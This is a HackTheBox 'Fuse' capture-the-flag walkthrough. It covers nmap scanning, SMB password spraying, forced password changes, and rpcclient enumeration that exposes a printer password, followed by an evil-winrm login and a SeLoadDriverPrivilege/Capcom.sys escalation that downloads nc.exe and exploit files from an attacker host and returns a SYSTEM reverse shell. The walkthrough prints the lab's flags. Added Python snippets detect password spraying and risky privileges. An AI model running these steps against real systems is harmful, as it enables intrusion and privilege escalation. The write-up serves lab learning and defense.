FUSE HACKTHEBOX WRITEUP

NMAP SCANS

    Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-05 16:07 IST
    NSE: Loaded 151 scripts for scanning.
    NSE: Script Pre-scanning.
    Initiating NSE at 16:07
    Completed NSE at 16:07, 0.00s elapsed
    Initiating NSE at 16:07
    Completed NSE at 16:07, 0.00s elapsed
    Initiating NSE at 16:07
    Completed NSE at 16:07, 0.00s elapsed
    Initiating Ping Scan at 16:07
    Scanning 10.10.10.193 [4 ports]
    Completed Ping Scan at 16:07, 0.70s elapsed (1 total hosts)
    Initiating SYN Stealth Scan at 16:07
    Scanning fuse.fabricorp.local (10.10.10.193) [1000 ports]
    Discovered open port 139/tcp on 10.10.10.193
    Discovered open port 135/tcp on 10.10.10.193
    Discovered open port 445/tcp on 10.10.10.193
    Discovered open port 53/tcp on 10.10.10.193
    Discovered open port 80/tcp on 10.10.10.193
    Discovered open port 3268/tcp on 10.10.10.193
    Discovered open port 464/tcp on 10.10.10.193
    Discovered open port 3269/tcp on 10.10.10.193
    Discovered open port 636/tcp on 10.10.10.193
    Discovered open port 593/tcp on 10.10.10.193
    Discovered open port 389/tcp on 10.10.10.193
    Discovered open port 88/tcp on 10.10.10.193
    Completed SYN Stealth Scan at 16:07, 27.82s elapsed (1000 total ports)
    Initiating Service scan at 16:07
    Scanning 12 services on fuse.fabricorp.local (10.10.10.193)
    Completed Service scan at 16:10, 158.15s elapsed (12 services on 1 host)
    Initiating OS detection (try #1) against fuse.fabricorp.local (10.10.10.193)
    Retrying OS detection (try #2) against fuse.fabricorp.local (10.10.10.193)
    Initiating Traceroute at 16:10
    Completed Traceroute at 16:10, 0.73s elapsed
    Initiating Parallel DNS resolution of 2 hosts. at 16:10
    Completed Parallel DNS resolution of 2 hosts. at 16:10, 0.80s elapsed
    NSE: Script scanning 10.10.10.193.
    Initiating NSE at 16:10
    Completed NSE at 16:11, 40.20s elapsed
    Initiating NSE at 16:11
    Completed NSE at 16:13, 122.25s elapsed
    Initiating NSE at 16:13
    Completed NSE at 16:13, 0.00s elapsed
    Nmap scan report for fuse.fabricorp.local (10.10.10.193)
    Host is up (0.53s latency).
    Not shown: 988 filtered ports
    PORT     STATE SERVICE      VERSION
    53/tcp   open  domain?
    | fingerprint-strings: 
    |   DNSVersionBindReqTCP: 
    |     version
    |_    bind
    80/tcp   open  http         Microsoft IIS httpd 10.0
    | http-methods: 
    |   Supported Methods: OPTIONS TRACE GET HEAD POST
    |_  Potentially risky methods: TRACE
    |_http-server-header: Microsoft-IIS/10.0
    |_http-title: Site doesn't have a title (text/html).
    88/tcp   open  kerberos-sec Microsoft Windows Kerberos (server time: 2020-07-05 10:55:57Z)
    135/tcp  open  msrpc        Microsoft Windows RPC
    139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
    389/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: fabricorp.local, Site: Default-First-Site-Name)
    445/tcp  open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: FABRICORP)
    464/tcp  open  kpasswd5?
    593/tcp  open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
    636/tcp  open  tcpwrapped
    3268/tcp open  ldap         Microsoft Windows Active Directory LDAP (Domain: fabricorp.local, Site: Default-First-Site-Name)
    3269/tcp open  tcpwrapped
    1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
    SF-Port53-TCP:V=7.80%I=7%D=7/5%Time=5F01AD7A%P=x86_64-pc-linux-gnu%r(DNSVe
    SF:rsionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\x
    SF:04bind\0\0\x10\0\x03");
    Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
    Device type: general purpose
    Running (JUST GUESSING): Microsoft Windows 2016|2012|2008 (91%)
    OS CPE: cpe:/o:microsoft:windows_server_2016 cpe:/o:microsoft:windows_server_2012 cpe:/o:microsoft:windows_server_2008:r2
    Aggressive OS guesses: Microsoft Windows Server 2016 (91%), Microsoft Windows Server 2012 (85%), Microsoft Windows Server 2012 or Windows Server 2012 R2 (85%), Microsoft Windows Server 2012 R2 (85%), Microsoft Windows Server 2008 R2 (85%)
    No exact OS matches for host (test conditions non-ideal).
    Uptime guess: 0.006 days (since Sun Jul  5 16:03:58 2020)
    Network Distance: 2 hops
    TCP Sequence Prediction: Difficulty=257 (Good luck!)
    IP ID Sequence Generation: Incremental
    Service Info: Host: FUSE; OS: Windows; CPE: cpe:/o:microsoft:windows

    Host script results:
    |_clock-skew: mean: 2h38m16s, deviation: 4h02m32s, median: 18m14s
    | smb-os-discovery: 
    |   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
    |   Computer name: Fuse
    |   NetBIOS computer name: FUSE\x00
    |   Domain name: fabricorp.local
    |   Forest name: fabricorp.local
    |   FQDN: Fuse.fabricorp.local
    |_  System time: 2020-07-05T03:58:42-07:00
    | smb-security-mode: 
    |   account_used: guest
    |   authentication_level: user
    |   challenge_response: supported
    |_  message_signing: required
    | smb2-security-mode: 
    |   2.02: 
    |_    Message signing enabled and required
    | smb2-time: 
    |   date: 2020-07-05T10:58:38
    |_  start_date: 2020-07-05T10:52:38

    TRACEROUTE (using port 139/tcp)
    HOP RTT       ADDRESS
    1   711.90 ms 10.10.14.1
    2   711.85 ms fuse.fabricorp.local (10.10.10.193)

    NSE: Script Post-scanning.
    Initiating NSE at 16:13
    Completed NSE at 16:13, 0.00s elapsed
    Initiating NSE at 16:13
    Completed NSE at 16:13, 0.00s elapsed
    Initiating NSE at 16:13
    Completed NSE at 16:13, 0.00s elapsed
    Read data files from: /usr/bin/../share/nmap
    OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 358.44 seconds
            Raw packets sent: 2089 (95.600KB) | Rcvd: 56 (3.168KB)

ENUMERATION

PORT 80 :

Here we have only a website, with some usernames in it.

So let's make a wordlist using CeWL.

PORT 389 :

    ┌─[✗]─[root@liquid]─[~/Desktop/HTB/fuse]
    └──╼ #ldapsearch -x -h 10.10.10.193 -s sub -b namingcontexts "dc=fuse,dc=htb"
    # extended LDIF
    #
    # LDAPv3
    # base <namingcontexts> with scope subtree
    # filter: dc=fuse,dc=htb
    # requesting: ALL
    #

    # search result
    search: 2
    result: 1 Operations error
    text: 000004DC: LdapErr: DSID-0C090A6C, comment: In order to perform this opera
    tion a successful bind must be completed on the connection., data 0, v3839

    # numResponses: 1

PORT 445 :

    ┌─[✗]─[root@liquid]─[~/Desktop/HTB/fuse]
    └──╼ #smbclient -L 10.10.10.193
    Enter WORKGROUP\root's password: 
    Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
    SMB1 disabled -- no workgroup available
    ┌─[root@liquid]─[~/Desktop/HTB/fuse]
    └──╼ #smbclient -U "" -L 10.10.10.193
    Enter WORKGROUP\'s password: 
    session setup failed: NT_STATUS_LOGON_FAILURE

PORT 135 :

    ┌─[✗]─[root@liquid]─[~/Desktop/HTB/fuse]
    └──╼ #rpcclient -U " " 10.10.10.193
    Enter WORKGROUP\ 's password: 
    Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE

Now we have seen that we cannot get into or use any service without a username and password, so let's use the wordlist with the users we got from the website above:

    msf5 auxiliary(scanner/smb/smb_login) > run

    [*] 10.10.10.193:445      - 10.10.10.193:445 - Starting SMB login bruteforce

    <--->

    [+] 10.10.10.193:445      - 10.10.10.193:445 - Success: '.\tlavel:Fabricorp01'
    [+] 10.10.10.193:445      - 10.10.10.193:445 - Success: '.\bhult:Fabricorp01'
    [+] 10.10.10.193:445      - 10.10.10.193:445 - Success: '.\bnielson:Fabricorp01'

    <--->

    [*] 10.10.10.193:445      - Scanned 1 of 1 hosts (100% complete)
    [*] Auxiliary module execution completed

Login SMB :

    ┌─[✗]─[root@liquid]─[~/Desktop/HTB/fuse]
    └──╼ #smbclient -U tlavel -L 10.10.10.193
    Enter WORKGROUP\tlavel's password: 
    session setup failed: NT_STATUS_PASSWORD_MUST_CHANGE

Here we need to change the password. So we will change the password for user tlavel and then log in with it, but one thing to remember is not to waste time: after changing the password we need to log in right away, otherwise you may face an error!

    ┌─[✗]─[root@liquid]─[~/Desktop/HTB/fuse]
    └──╼ #smbpasswd -U tlavel -r 10.10.10.193
    Old SMB password:
    New SMB password:
    Retype new SMB password:
    Password changed for user tlavel on 10.10.10.193.
    ┌─[✗]─[root@liquid]─[~/Desktop/HTB/fuse]
    └──╼ #smbclient -U tlavel -L 10.10.10.193
    Enter WORKGROUP\tlavel's password: 

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        HP-MFT01        Printer   HP-MFT01
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        print$          Disk      Printer Drivers
        SYSVOL          Disk      Logon server share 
    SMB1 disabled -- no workgroup available

But in smbclient we got nothing, so we need to use this password somewhere else.

The remaining ones are RPC and evil-winrm.

In the case of evil-winrm it did not work, and in the case of RPC:

    ┌─[✗]─[root@liquid]─[~/Desktop/HTB/fuse]
    └──╼ #rpcclient -U tlavel -L 10.10.10.193
    Enter WORKGROUP\tlavel's password: 

    Cannot connect to server.  Error was NT_STATUS_PASSWORD_MUST_CHANGE

Here also we need to change the password; we will do it the same way as for SMB.

    ┌─[✗]─[root@liquid]─[~/Desktop/HTB/fuse]
    └──╼ #smbpasswd -U tlavel -r 10.10.10.193
    Old SMB password:
    New SMB password:
    Retype new SMB password:
    Password changed for user tlavel on 10.10.10.193.
    ┌─[root@liquid]─[~/Desktop/HTB/fuse]
    └──╼ #rpcclient -U tlavel -L 10.10.10.193
    Enter WORKGROUP\tlavel's password: 
    rpcclient $> enumdomusers 
    user:[Administrator] rid:[0x1f4]
    user:[Guest] rid:[0x1f5]
    user:[krbtgt] rid:[0x1f6]
    user:[DefaultAccount] rid:[0x1f7]
    user:[svc-print] rid:[0x450]
    user:[bnielson] rid:[0x451]
    user:[sthompson] rid:[0x641]
    user:[tlavel] rid:[0x642]
    user:[pmerton] rid:[0x643]
    user:[svc-scan] rid:[0x645]
    user:[bhult] rid:[0x1bbd]
    user:[dandrews] rid:[0x1bbe]
    user:[mberbatov] rid:[0x1db1]
    user:[astein] rid:[0x1db2]
    user:[dmuir] rid:[0x1db3]

Here we see that there are svc accounts. An svc account is a service account, which could be tied directly to Kerberos, but could also just be an ordinary user!

So let's try Kerberos!

    ┌─[✗]─[root@liquid]─[~/Desktop/HTB/fuse]
    └──╼ #./GetUserSPNs.py -request -dc-ip 10.10.10.193 fabricorp.local/svc-print -no-pass
    Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

    [-] Error in bindRequest -> invalidCredentials: 8009030C: LdapErr: DSID-0C0906C1, comment: AcceptSecurityContext error, data 52e, v3839
    ┌─[root@liquid]─[~/Desktop/HTB/fuse]
    └──╼ #./GetUserSPNs.py -request -dc-ip 10.10.10.193 fabricorp.local/svc-scan -no-pass
    Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

    [-] Error in bindRequest -> invalidCredentials: 8009030C: LdapErr: DSID-0C0906C1, comment: AcceptSecurityContext error, data 52e, v3839

So we need to enumerate more in rpcclient:

    rpcclient $> enumprinters 
        flags:[0x800000]
        name:[\\10.10.10.193\HP-MFT01]
        description:[\\10.10.10.193\HP-MFT01,HP Universal Printing PCL 6,Central (Near IT, scan2docs password: $fab@s3Rv1ce$1)]
        comment:[]

    rpcclient $> 

Here we got another password, which definitely looks like a user password for login!

LOGIN AND USER ENUMERATION

So we created a wordlist and tried the usernames for login with the passwords we got from the enumeration above:

    msf5 auxiliary(scanner/smb/smb_login) > run

    [*] 10.10.10.193:445      - 10.10.10.193:445 - Starting SMB login bruteforce

    <--->

    [-] 10.10.10.193:445      - 10.10.10.193:445 - Failed: '.\astein:$fab@s3Rv1ce$1',
    [-] 10.10.10.193:445      - 10.10.10.193:445 - Failed: '.\astein:Fabricorp01',
    [-] 10.10.10.193:445      - 10.10.10.193:445 - Failed: '.\bhult:$fab@s3Rv1ce$1',
    [+] 10.10.10.193:445      - 10.10.10.193:445 - Success: '.\bhult:Fabricorp01'
    [+] 10.10.10.193:445      - 10.10.10.193:445 - Success: '.\svc-print:$fab@s3Rv1ce$1'
    [+] 10.10.10.193:445      - 10.10.10.193:445 - Success: '.\svc-scan:$fab@s3Rv1ce$1'
    [-] 10.10.10.193:445      - 10.10.10.193:445 - Failed: '.\tlavel:$fab@s3Rv1ce$1',
    [+] 10.10.10.193:445      - 10.10.10.193:445 - Success: '.\tlavel:Fabricorp01'

    <--->

    [*] 10.10.10.193:445      - Scanned 1 of 1 hosts (100% complete)
    [*] Auxiliary module execution completed 
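Both smb_login runs (this one and the earlier one that found Fabricorp01) are password sprays: one password tried across a list of usernames. That pattern is easy to pick out of a domain controller's Security log, and the Python detector below is an added example, not part of the original writeup. It runs over a constructed event sample; the usernames, source addresses and thresholds are illustrative assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed Windows Security log sample (illustrative, not this box's logs):
# (timestamp, event id, target user, source ip, substatus). 4625 = failed logon,
# 4624 = success; 0xC000006A = bad password, 0xC0000064 = no such user.
SAMPLE_EVENTS = [
    ("2020-07-05T10:58:01", 4625, "astein",   "10.10.14.12", "0xC000006A"),
    ("2020-07-05T10:58:02", 4625, "bhult",    "10.10.14.12", "0xC000006A"),
    ("2020-07-05T10:58:02", 4625, "bnielson", "10.10.14.12", "0xC000006A"),
    ("2020-07-05T10:58:03", 4625, "dandrews", "10.10.14.12", "0xC000006A"),
    ("2020-07-05T10:58:03", 4625, "pmerton",  "10.10.14.12", "0xC000006A"),
    ("2020-07-05T10:58:04", 4625, "jdoe",     "10.10.14.12", "0xC0000064"),
    ("2020-07-05T10:58:05", 4624, "tlavel",   "10.10.14.12", "0x0"),
    # One user mistyping their own password twice is noise, not a spray.
    ("2020-07-05T11:30:00", 4625, "pmerton",  "10.10.10.50", "0xC000006A"),
    ("2020-07-05T11:30:20", 4625, "pmerton",  "10.10.10.50", "0xC000006A"),
    ("2020-07-05T11:31:00", 4624, "pmerton",  "10.10.10.50", "0x0"),
]

def detect_spray(events, window=timedelta(minutes=5), min_users=5, max_per_user=2):
    """Return {source_ip: sorted usernames} for sources whose failed logons hit
    at least `min_users` distinct accounts inside `window` with no more than
    `max_per_user` failures per account, i.e. one or two passwords tried across
    a whole user list. A brute force on one account fails the per-user bound;
    a single user's typos fail the user count."""
    failures = defaultdict(list)
    for ts, event_id, user, ip, _sub in events:
        if event_id == 4625:
            failures[ip].append((datetime.fromisoformat(ts), user.lower()))
    alerts = {}
    for ip, attempts in failures.items():
        attempts.sort()
        for i, (start, _) in enumerate(attempts):       # sliding window start
            per_user = defaultdict(int)
            for ts, user in attempts[i:]:
                if ts - start > window:
                    break
                per_user[user] += 1
            if len(per_user) >= min_users and max(per_user.values()) <= max_per_user:
                alerts[ip] = sorted(per_user)
                break
    return alerts

def compromised_after_spray(events, alerts):
    """Accounts with a successful logon (4624) from a spraying source: the
    credentials the spray actually found, which should be reset first."""
    return sorted({u for _, eid, u, ip, _ in events if eid == 4624 and ip in alerts})
```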

So let's give it a try with EVIL-WINRM:

    ┌─[✗]─[root@liquid]─[~/Desktop/HTB/fuse]
    └──╼ #evil-winrm  -i 10.10.10.193 -u svc-print -p '$fab@s3Rv1ce$1'

    Evil-WinRM shell v2.3

    Info: Establishing connection to remote endpoint

    *Evil-WinRM* PS C:\Users\svc-print\Documents> whoami
    fabricorp\svc-print
    *Evil-WinRM* PS C:\Users\svc-print\Documents> cd ../Desktop
    *Evil-WinRM* PS C:\Users\svc-print\Desktop> type user.txt
    6029348aa869b0b0331d5087ee78b79b
    *Evil-WinRM* PS C:\Users\svc-print\Desktop> 

It's time for Privilege Escalation.

    *Evil-WinRM* PS C:\Users\svc-print\Desktop> whoami /priv

    PRIVILEGES INFORMATION
    ----------------------

    Privilege Name                Description                    State
    ============================= ============================== =======
    SeMachineAccountPrivilege     Add workstations to domain     Enabled
    SeLoadDriverPrivilege         Load and unload device drivers Enabled
    SeShutdownPrivilege           Shut down the system           Enabled
    SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
    SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

Here the only thing that looks suspicious is LOAD AND UNLOAD DRIVERS.

When I searched for it, there was a privilege escalation method which could help get ADMINISTRATOR access.
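The `whoami /priv` check above is worth automating on the defensive side: a non-admin token holding one of a short list of privileges is a finding whether it shows Enabled or Disabled, since a process can re-enable any privilege its token already holds. This Python audit is an added example, not part of the writeup; its sample input is the output shown above, and the HIGH_RISK list is my own selection.

```python
import re

# Privileges that let their holder reach SYSTEM or read any file. A Disabled
# privilege still counts: a process can re-enable anything its token holds.
HIGH_RISK = {
    "SeLoadDriverPrivilege": "load a kernel driver, i.e. run code in ring 0",
    "SeDebugPrivilege": "open and tamper with any process, including SYSTEM ones",
    "SeImpersonatePrivilege": "impersonate the security context of other users",
    "SeAssignPrimaryTokenPrivilege": "start processes under another user's token",
    "SeBackupPrivilege": "read any file regardless of ACL (SAM, NTDS.dit)",
    "SeRestorePrivilege": "write any file regardless of ACL",
    "SeTakeOwnershipPrivilege": "take ownership of any securable object",
    "SeTcbPrivilege": "act as part of the operating system",
}

# The `whoami /priv` output shown in the writeup above, used as sample input.
SAMPLE_WHOAMI_PRIV = """
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeLoadDriverPrivilege         Load and unload device drivers Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
"""

def parse_whoami_priv(text):
    """Parse `whoami /priv` output into {privilege_name: state}. Rows are sliced
    by the column widths of the '=====' underline, because a description can
    run right up to the State column with only a single space between them."""
    privs, spans = {}, None
    for line in text.splitlines():
        if line.startswith("====="):
            spans = [m.span() for m in re.finditer(r"=+", line)]
            continue
        if spans is None or not line.strip():
            continue
        cells = [line[a:b].strip() for a, b in spans[:-1]]
        cells.append(line[spans[-1][0]:].strip())      # last column may be wider
        if len(cells) == 3 and cells[0].startswith("Se"):
            privs[cells[0]] = cells[2]
    return privs

def audit_privileges(text):
    """Return [(privilege, state, reason)] for every high-risk privilege held."""
    return [(name, state, HIGH_RISK[name])
            for name, state in parse_whoami_priv(text).items() if name in HIGH_RISK]
```

SeLoadDriverPrivilege comes from the "Load and unload device drivers" user right, which on a domain controller is granted by default to Administrators and Print Operators, so the group memberships of a service account are the first thing to review when this fires.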

GETTING ROOT ACCESS

Here we have a way to escalate; now we need to know how, so let's get some info:

https://www.tarlogic.com/en/blog/abusing-seloaddriverprivilege-for-privilege-escalation/

https://github.com/Manangoel98/SELOADDRIVER-EXPLOIT

So make a Temp directory in the C:\ folder:

    *Evil-WinRM* PS C:\Temp> invoke-webrequest -Uri http://10.10.14.12/EOPLOADDRIVER.exe -OutFile EOPLOADDRIVER.exe
    *Evil-WinRM* PS C:\Temp> invoke-webrequest -Uri http://10.10.14.12/exploitcapcom.exe -OutFile exploitcapcom.exe
    *Evil-WinRM* PS C:\Temp> invoke-webrequest -Uri http://10.10.14.12/liquid.bat -OutFile liquid.bat
    *Evil-WinRM* PS C:\Temp> invoke-webrequest -Uri http://10.10.14.12/nc.exe -OutFile nc.exe
    *Evil-WinRM* PS C:\Temp> invoke-webrequest -Uri http://10.10.14.12/Capcom.sys -OutFile Capcom.sys

After getting every file onto the machine, just run these commands, and remember to open a netcat listener on your attacker machine.

VICTIM MACHINE

    *Evil-WinRM* PS C:\Temp> .\EOPLOADDRIVER.exe System\CurrentControlSet\MyService C:\temp\capcom.sys
    [+] Enabling SeLoadDriverPrivilege
    [+] SeLoadDriverPrivilege Enabled
    [+] Loading Driver: \Registry\User\S-1-5-21-2633719317-1471316042-3957863514-1104\System\CurrentControlSet\MyService
    NTSTATUS: 00000000, WinError: 0
    *Evil-WinRM* PS C:\Temp> .\exploitcapcom.exe liquid.bat
    [*] Capcom.sys exploit
    [*] Capcom.sys handle was obtained as 0000000000000080
    [*] Shellcode was placed at 00000298BA140008
    [+] Shellcode was executed
    [+] Token stealing was successful
    [+] The SYSTEM shell was launched
    [*] Press any key to exit this program

ATTACKER MACHINE

    ┌─[root@liquid]─[~/Desktop/HTB/fuse]
    └──╼ #nc -lnvp 9005
    listening on [any] 9005 ...
    connect to [10.10.14.12] from (UNKNOWN) [10.10.10.193] 50594
    Microsoft Windows [Version 10.0.14393]
    (c) 2016 Microsoft Corporation. All rights reserved.

    C:\Temp>whoami
    whoami
    nt authority\system

    C:\Temp>cd ../Users/Administrator/Desktop
    cd ../Users/Administrator/Desktop

    C:\Users\Administrator\Desktop>type root.txt
    type root.txt
    61a36b85339ea1ba67fa7e3f55f3a9a6

    C:\Users\Administrator\Desktop>

HOPE YOU LOVE THIS WALKTHROUGH BY LIQUIDRAGE
